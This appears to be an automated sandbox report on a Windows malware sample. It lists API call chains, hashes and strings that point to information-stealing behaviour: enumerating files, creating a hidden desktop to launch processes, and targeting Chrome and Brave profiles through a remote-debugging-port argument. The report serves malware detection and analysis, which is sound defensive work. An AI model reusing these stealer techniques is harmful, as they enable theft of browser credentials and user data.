                                      • API String ID: 2087232378-0
                                      • Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                      • Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
                                      • Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                      • Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4
                                      APIs
                                        • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                        • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                        • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                        • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                        • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                        • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                      • ExitProcess.KERNEL32 ref: 004011C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 1004333139-0
                                      • Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                      • Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
                                      • Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                      • Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02E3A3B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2e39000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction ID: dbbfc1465a6b0496884b622fcb84c9410759760c3be758dc18a1cb9722a1f333
                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction Fuzzy Hash: 29112D79A40208EFDB01DF98C989E98BBF5AF08351F0580A4F9489B361D371EA90DF80
                                      APIs
                                        • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                        • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                        • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                        • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                        • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                        • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                        • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
                                      • StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
                                      • StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
                                      • FindClose.KERNEL32(000000FF), ref: 0040C8BB
                                      Strings
                                      • \Brave\Preferences, xrefs: 0040C1C1
                                      • Brave, xrefs: 0040C0E8
                                      • Preferences, xrefs: 0040C104
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
                                      • Google Chrome, xrefs: 0040C6F8
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: 7f2c12acea1fb690b98b804b029ed6a0b383e69760eb48825d33dc6626a9561a
                                      • Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
                                      • Opcode Fuzzy Hash: 7f2c12acea1fb690b98b804b029ed6a0b383e69760eb48825d33dc6626a9561a
                                      • Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA
                                      APIs
                                      • wsprintfA.USER32 ref: 00413B1C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00413B33
                                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                      • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                      • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                      • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
                                      • API String ID: 1125553467-4052298153
                                      • Opcode ID: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                      • Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
                                      • Opcode Fuzzy Hash: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                      • Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66
                                      APIs
                                        • Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF
                                        • Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
                                        • Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9
                                        • Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
                                        • Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
                                        • Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89
                                        • Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C
                                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 048CC12C
                                      • StrCmpCA.SHLWAPI(?,00421454), ref: 048CC19A
                                      • StrCmpCA.SHLWAPI(?,00421458), ref: 048CC1B0
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048CCB10
                                      • FindClose.KERNEL32(000000FF), ref: 048CCB22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                      • Instruction ID: a03d522dce438bc464af791a4a44dbd3b31fc22e789497511afc5c49990287bf
                                      • Opcode Fuzzy Hash: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                      • Instruction Fuzzy Hash: 7F5272729011189BDB18FB64DC94EEE7339AF54305F504AADA50BE6090EFB4BB48CF52
                                      APIs
                                      • wsprintfA.USER32 ref: 00414B7C
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                      • FindClose.KERNEL32(000000FF), ref: 00414DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s$%s\%s$%s\*$-SA
                                      • API String ID: 180737720-309722913
                                      • Opcode ID: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
                                      • Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
                                      • Opcode Fuzzy Hash: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
                                      • Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95
                                      APIs
                                      • wsprintfA.USER32 ref: 048D3D83
                                      • FindFirstFileA.KERNEL32(?,?), ref: 048D3D9A
                                      • lstrcat.KERNEL32(?,?), ref: 048D3DEC
                                      • StrCmpCA.SHLWAPI(?,00420F58), ref: 048D3DFE
                                      • StrCmpCA.SHLWAPI(?,00420F5C), ref: 048D3E14
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048D411E
                                      • FindClose.KERNEL32(000000FF), ref: 048D4133
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID:
                                      • API String ID: 1125553467-0
                                      • Opcode ID: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                      • Instruction ID: e817fe46c3d938f275d9e9890e2455ba5f6f466c36713db74b920947e98ee748
                                      • Opcode Fuzzy Hash: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                      • Instruction Fuzzy Hash: D1A16371A012189BDB34DFA4DC84FEE7379BF58700F444A89A60DD6180EB75AB84CF62
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                      • HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                      • wsprintfA.USER32 ref: 004147F6
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
                                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
                                      • FindClose.KERNEL32(000000FF), ref: 004148F0
                                      • lstrcatA.KERNEL32(?,02EB23C0,?,00000104), ref: 00414915
                                      • lstrcatA.KERNEL32(?,02EB5D30), ref: 00414928
                                      • lstrlenA.KERNEL32(?), ref: 00414935
                                      • lstrlenA.KERNEL32(?), ref: 00414946
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 13328894-2848263008
                                      • Opcode ID: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                      • Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
                                      • Opcode Fuzzy Hash: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                      • Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95
                                      APIs
                                      • wsprintfA.USER32 ref: 048D4DE3
                                      • FindFirstFileA.KERNEL32(?,?), ref: 048D4DFA
                                      • StrCmpCA.SHLWAPI(?,00420FC4), ref: 048D4E28
                                      • StrCmpCA.SHLWAPI(?,00420FC8), ref: 048D4E3E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048D5034
                                      • FindClose.KERNEL32(000000FF), ref: 048D5049
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                      • Instruction ID: fcd7d2334959c4d155559a81bf2da8afd9228f9366720ddec1e843fdd1cb10ba
                                      • Opcode Fuzzy Hash: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                      • Instruction Fuzzy Hash: 8B616572D01218ABDB24EBA4DD48FEA737DAF48705F40468DB609D6080FB75AB84CF91
                                      APIs
                                      • memset.MSVCRT ref: 00409E47
                                        • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                      • wsprintfA.USER32 ref: 00409E7F
                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
                                      • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
                                      • memset.MSVCRT ref: 00409EED
                                      • lstrcatA.KERNEL32(00000000,?), ref: 00409F03
                                      • lstrcatA.KERNEL32(00000000,?), ref: 00409F17
                                      • lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
                                      • memset.MSVCRT ref: 00409F3D
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
                                      • memset.MSVCRT ref: 00409F9C
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
                                      • Sleep.KERNEL32(00001388), ref: 0040A013
                                      • CloseDesktop.USER32(00000000), ref: 0040A060
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 1347862506-2746444292
                                      • Opcode ID: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
                                      • Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
                                      • Opcode Fuzzy Hash: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
                                      • Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55
                                      APIs
                                      • wsprintfA.USER32 ref: 00414113
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0041412A
                                      • StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
                                      • StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
                                      • FindClose.KERNEL32(000000FF), ref: 004142D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 180737720-4073750446
                                      • Opcode ID: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                      • Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
                                      • Opcode Fuzzy Hash: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                      • Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 048D4A37
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 048D4A3E
                                      • wsprintfA.USER32 ref: 048D4A5D
                                      • FindFirstFileA.KERNEL32(?,?), ref: 048D4A74
                                      • StrCmpCA.SHLWAPI(?,00420FAC), ref: 048D4AA2
                                      • StrCmpCA.SHLWAPI(?,00420FB0), ref: 048D4AB8
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048D4B42
                                      • FindClose.KERNEL32(000000FF), ref: 048D4B57
                                      • lstrcat.KERNEL32(?,006D6F24), ref: 048D4B7C
                                      • lstrcat.KERNEL32(?,006D6C2C), ref: 048D4B8F
                                      • lstrlen.KERNEL32(?), ref: 048D4B9C
                                      • lstrlen.KERNEL32(?), ref: 048D4BAD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                      • String ID:
                                      • API String ID: 671575355-0
                                      • Opcode ID: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                      • Instruction ID: 42bfd560de2aefe5ee7539068bf06796506cb50ca131ed2ec4a3de6dbcf72354
                                      • Opcode Fuzzy Hash: 40b38b74226c8604f7a13fd3e1b0225e2dd82a7444d87f96db159f9eec02a11e
                                      • Instruction Fuzzy Hash: 685176B1945218ABDB24EB74DC88FED737DAF58700F404A89F649D6090EB74AB84CF52
                                      APIs
                                      • wsprintfA.USER32 ref: 048D437A
                                      • FindFirstFileA.KERNEL32(?,?), ref: 048D4391
                                      • StrCmpCA.SHLWAPI(?,00420F94), ref: 048D43BF
                                      • StrCmpCA.SHLWAPI(?,00420F98), ref: 048D43D5
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 048D4523
                                      • FindClose.KERNEL32(000000FF), ref: 048D4538
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID:
                                      • API String ID: 180737720-0
                                      • Opcode ID: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                      • Instruction ID: 705330f36df985c4dbf9f21fcfc56c0db32f30771ea7e3440a10552be50f78a9
                                      • Opcode Fuzzy Hash: ac94dde27fa3a8b2d1992181d9aeba8d94f37141b24e2c59e50ce182db00ab73
                                      • Instruction Fuzzy Hash: E551B8B1905218ABDB24EB74DD84EEA737DBB54304F404BCDB649D2050EBB5AB84CF51
                                      APIs
                                      • wsprintfA.USER32 ref: 0040EE3E
                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
                                      • StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
                                      • StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
                                      • FindClose.KERNEL32(000000FF), ref: 0040F3C3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextwsprintf
                                      • String ID: %s\*.*
                                      • API String ID: 180737720-1013718255
                                      • Opcode ID: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
                                      • Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
                                      • Opcode Fuzzy Hash: 44e4519d460c571b6f7c13e0b12cc26d697540730552fd87f4480f32e4084b77
                                      • Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59
                                      Strings
                                      Memory Dump Source
